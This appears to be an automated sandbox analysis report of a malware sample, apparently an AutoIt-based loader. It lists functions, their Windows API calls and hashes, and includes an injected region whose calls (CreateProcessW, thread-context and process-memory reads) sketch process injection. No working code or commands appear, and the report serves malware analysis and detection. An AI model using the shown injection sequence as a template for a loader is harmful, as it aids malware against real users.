                                    control_flow_graph 1070 18e2410-18e2565 call 18e0000 call 18e2300 CreateFileW 1077 18e256c-18e257c 1070->1077 1078 18e2567 1070->1078 1081 18e257e 1077->1081 1082 18e2583-18e259d VirtualAlloc 1077->1082 1079 18e261c-18e2621 1078->1079 1081->1079 1083 18e259f 1082->1083 1084 18e25a1-18e25b8 ReadFile 1082->1084 1083->1079 1085 18e25bc-18e25f6 call 18e2340 call 18e1300 1084->1085 1086 18e25ba 1084->1086 1091 18e25f8-18e260d call 18e2390 1085->1091 1092 18e2612-18e261a ExitProcess 1085->1092 1086->1079 1091->1092 1092->1079
                                    APIs
                                      • Part of subcall function 018E2300: Sleep.KERNELBASE(000001F4), ref: 018E2311
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018E255B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 7RNC0I0NAQKMTLNUI9AG29
                                    • API String ID: 2694422964-499658212
                                    • Opcode ID: 7891fbc8e36fbd89c2342ae7726209f4430fcdb81aefd61cd41e34e5016f66e3
                                    • Instruction ID: 250e8d850e7a83894abf5cb63a67fdade6c3c28d44c4b643abf1f5d3f6aef5f5
                                    • Opcode Fuzzy Hash: 7891fbc8e36fbd89c2342ae7726209f4430fcdb81aefd61cd41e34e5016f66e3
                                    • Instruction Fuzzy Hash: 7F618570D14288DAEF11DBE4C858BDEBBB9AF15304F044199E609BB2C1D7B91B44CB66
                                    Function 00F0410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1094 f0410d-f04123 1095 f04200-f04204 1094->1095 1096 f04129-f0413e call f07b76 1094->1096 1099 f04144-f04164 call f07d2c 1096->1099 1100 f3d5dd-f3d5ec LoadStringW 1096->1100 1103 f3d5f7-f3d60f call f07c8e call f07143 1099->1103 1104 f0416a-f0416e 1099->1104 1100->1103 1114 f0417e-f041fb call f23020 call f0463e call f22ffc Shell_NotifyIconW call f05a64 1103->1114 1116 f3d615-f3d633 call f07e0b call f07143 call f07e0b 1103->1116 1106 f04174-f04179 call f07c8e 1104->1106 1107 f04205-f0420e call f081a7 1104->1107 1106->1114 1107->1114 1114->1095 1116->1114
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F3D5EC
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    • _memset.LIBCMT ref: 00F0418D
                                    • _wcscpy.LIBCMT ref: 00F041E1
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F041F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 3942752672-1585850449
                                    • Opcode ID: cc0ae54340a7557007f302ce160b41ccfd42c7208c0b0e91337a7e4d544f75de
                                    • Instruction ID: f1facbac7d52bc1a8735b9cb926240a387d020b85f7c005fd1c3b7cbe8666331
                                    • Opcode Fuzzy Hash: cc0ae54340a7557007f302ce160b41ccfd42c7208c0b0e91337a7e4d544f75de
                                    • Instruction Fuzzy Hash: AF31C1B180C304AAD721EB60DD46FDB77E8AF44310F10455AF194920E2EB78B648F792
                                    Function 00F2564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                    • String ID:
                                    • API String ID: 1559183368-0
                                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                    • Instruction ID: f803e6e5b91c3852aff964b5c6e088e774148f5a020e9f16a0a22c6fbb766290
                                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                    • Instruction Fuzzy Hash: 5E51E371E01B29DFDB248FB9E88466E7BA1EF40B30F248329F835962D0D7749D54AB40
                                    Function 00F069CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F04F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04F6F
                                    • _free.LIBCMT ref: 00F3E68C
                                    • _free.LIBCMT ref: 00F3E6D3
                                      • Part of subcall function 00F06BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F06D0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 2861923089-1757145024
                                    • Opcode ID: 853b5e3fd2f9d1ef60265c3f05ed46d3564a6c7ecec421d8453b92f6abccf4f2
                                    • Instruction ID: 54c77f74e9758684e9916f211333439668f15ad9c54978c2d48d7ed88d344823
                                    • Opcode Fuzzy Hash: 853b5e3fd2f9d1ef60265c3f05ed46d3564a6c7ecec421d8453b92f6abccf4f2
                                    • Instruction Fuzzy Hash: DE913B71910219EFCF04EFA4CC919EDB7B4BF18324F144469F815AB2E1EB39A915EB60
                                    Function 00F035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F035A1,SwapMouseButtons,00000004,?), ref: 00F035D4
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F035A1,SwapMouseButtons,00000004,?,?,?,?,00F02754), ref: 00F035F5
                                    • RegCloseKey.KERNELBASE(00000000,?,?,00F035A1,SwapMouseButtons,00000004,?,?,?,?,00F02754), ref: 00F03617
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 08f83db2f1705d72b9ad0af17479e0ab32cb73145b7d4f76d35bc8be5e6d713f
                                    • Instruction ID: 489fb4fa2813a144f41ddc0093fe097a95cf3bc10a380b85a5aa54c51d37f909
                                    • Opcode Fuzzy Hash: 08f83db2f1705d72b9ad0af17479e0ab32cb73145b7d4f76d35bc8be5e6d713f
                                    • Instruction Fuzzy Hash: F5114571A10208BFDB208F64DC80EFEBBBCEF04750F108469E805D7250E6729E44BBA0
                                    Function 018E1300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 018E1ABB
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018E1B51
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018E1B73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                    • Instruction ID: b7f9b8caf2f99bcd25dec604f112f12b33ec318192ed0f8dbf4c196f04bee616
                                    • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                    • Instruction Fuzzy Hash: 01620C30A14258DBEB24CFA4C854BDEB776EF59300F1091A9D20DEB390E7769E81CB59
                                    Function 00F697E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F05045: _fseek.LIBCMT ref: 00F0505D
                                      • Part of subcall function 00F699BE: _wcscmp.LIBCMT ref: 00F69AAE
                                      • Part of subcall function 00F699BE: _wcscmp.LIBCMT ref: 00F69AC1
                                    • _free.LIBCMT ref: 00F6992C
                                    • _free.LIBCMT ref: 00F69933
                                    • _free.LIBCMT ref: 00F6999E
                                      • Part of subcall function 00F22F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00F29C64), ref: 00F22FA9
                                      • Part of subcall function 00F22F95: GetLastError.KERNEL32(00000000,?,00F29C64), ref: 00F22FBB
                                    • _free.LIBCMT ref: 00F699A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                    • Instruction ID: 6ea10c1b82bc75fa48f0aa6f4251f7366e66d76fc031889b9e17b3ed8757a764
                                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                    • Instruction Fuzzy Hash: CE516FB1D04218AFDF249F64DC81A9EBBB9EF48710F1004AEF609A7281DB755E80DF58
                                    Function 00F2493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                    • String ID:
                                    • API String ID: 2782032738-0
                                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                    • Instruction ID: 3e65e020f59e74e2d30fcbcc92c656dab50f543a1b47b07d94c92e0fba69d1b4
                                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                    • Instruction Fuzzy Hash: B941D671A406259BDF28CE69E88096F77A6EF84360B24813DE855C7640D7B9AD80AF44
                                    Function 00F073E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F3EE62
                                    • 75D3D0D0.COMDLG32(?), ref: 00F3EEAC
                                      • Part of subcall function 00F048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F048A1,?,?,00F037C0,?), ref: 00F048CE
                                      • Part of subcall function 00F209D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F209F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: NamePath$FullLong_memset
                                    • String ID: X
                                    • API String ID: 3051022977-3081909835
                                    • Opcode ID: 797a1c22373bc6364757a817deaab00f258c80b31b3da0c6b09a6b7ec6658e10
                                    • Instruction ID: 4e4391b185ad5d2a154f9f61633021bb5c4586d8381e742fac2eab036563aa9b
                                    • Opcode Fuzzy Hash: 797a1c22373bc6364757a817deaab00f258c80b31b3da0c6b09a6b7ec6658e10
                                    • Instruction Fuzzy Hash: C221C371E042589BCB01EF94CC45BEE7BF89F49320F00405AE509E7282DBF85989AFA1
                                    Function 00F6901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __fread_nolock_memmove
                                    • String ID: EA06
                                    • API String ID: 1988441806-3962188686
                                    • Opcode ID: 0e8db7f7d6c47824f318703ff0a34385bcbd2f19ad4f18e9217f1c2d0238efff
                                    • Instruction ID: 7a68e0d605a9ef5d93680e558d3b5257429d9a1d0826ab3aaf4998fa6a2e5f0c
                                    • Opcode Fuzzy Hash: 0e8db7f7d6c47824f318703ff0a34385bcbd2f19ad4f18e9217f1c2d0238efff
                                    • Instruction Fuzzy Hash: 9B01F972804228BEDB28C6A8DC16FFE7BFCDB15701F00419AF552D2181E5B9E604DB60
                                    Function 00F20FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F2594C: __FF_MSGBANNER.LIBCMT ref: 00F25963
                                      • Part of subcall function 00F2594C: __NMSG_WRITE.LIBCMT ref: 00F2596A
                                      • Part of subcall function 00F2594C: RtlAllocateHeap.NTDLL(01970000,00000000,00000001), ref: 00F2598F
                                    • std::exception::exception.LIBCMT ref: 00F2102C
                                    • __CxxThrowException@8.LIBCMT ref: 00F21041
                                      • Part of subcall function 00F287DB: RaiseException.KERNEL32(?,?,00000000,00FBBAF8,?,00000001,?,?,?,00F21046,00000000,00FBBAF8,00F09FEC,00000001), ref: 00F28830
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID: bad allocation
                                    • API String ID: 3902256705-2104205924
                                    • Opcode ID: 79ad5955b407c47b5fd5be4f0265e77b926937e07b9cdc52768504613ce70b37
                                    • Instruction ID: f27a923ab36183aa229cfabed18b46c99a12341d03821ae3b02ce1c592698b4b
                                    • Opcode Fuzzy Hash: 79ad5955b407c47b5fd5be4f0265e77b926937e07b9cdc52768504613ce70b37
                                    • Instruction Fuzzy Hash: F2F0F43590126DA6DB20EA98FC059DF7BACAF00360F100026F90892182EFB48A81B2E4
                                    Function 00F69B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00F69B82
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F69B99
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: 9a0a856d839d93184b533177bbe6fe348197ad0a477e0a2be0322f109e67e913
                                    • Instruction ID: 4144bcdb57578d75cbbfa6a067ea17f00527073c7fb0cf8ece9396602d5cc019
                                    • Opcode Fuzzy Hash: 9a0a856d839d93184b533177bbe6fe348197ad0a477e0a2be0322f109e67e913
                                    • Instruction Fuzzy Hash: 5BD05E7954030DAFDB50DBA0DC4EFEA772CE704700F0046A1BE54D10A1DEB195989B92
                                    Function 00F7CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ffdf4c53f0258ee53083fd09572c16350fdf83ab027cd9b1bdaad3d85545f89f
                                    • Instruction ID: 63aa8eff8396594fc9a339f3cb8ba49e14fb1bba9753712a6e7dbbe6ad1a5ec2
                                    • Opcode Fuzzy Hash: ffdf4c53f0258ee53083fd09572c16350fdf83ab027cd9b1bdaad3d85545f89f
                                    • Instruction Fuzzy Hash: EFF15A71A083019FC714DF28C880A6ABBF5FF88314F54892EF89997252D775E946DF82
                                    Function 00F0F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F203D3
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F203DB
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F203E6
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F203F1
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F203F9
                                      • Part of subcall function 00F203A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F20401
                                      • Part of subcall function 00F16259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00F162B4
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F0FB2D
                                    • OleInitialize.OLE32(00000000), ref: 00F0FBAA
                                    • CloseHandle.KERNEL32(00000000), ref: 00F449F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                    • String ID:
                                    • API String ID: 3094916012-0
                                    • Opcode ID: 4e1fce4f9c8ea9d1e9bb7cde2c2c2895f012ca47ea522952dfd744e9d7fa7daf
                                    • Instruction ID: a0154df4f9f9d41040de8440a9316a2a0b8b0f00bc2a22c827a397a3b586716c
                                    • Opcode Fuzzy Hash: 4e1fce4f9c8ea9d1e9bb7cde2c2c2895f012ca47ea522952dfd744e9d7fa7daf
                                    • Instruction Fuzzy Hash: FA8199B090C2898EC788EF29EF56E557BE4FB88308310897E9419C7362EB394409FF51
                                    Function 00F043DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F04401
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F044A6
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F044C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
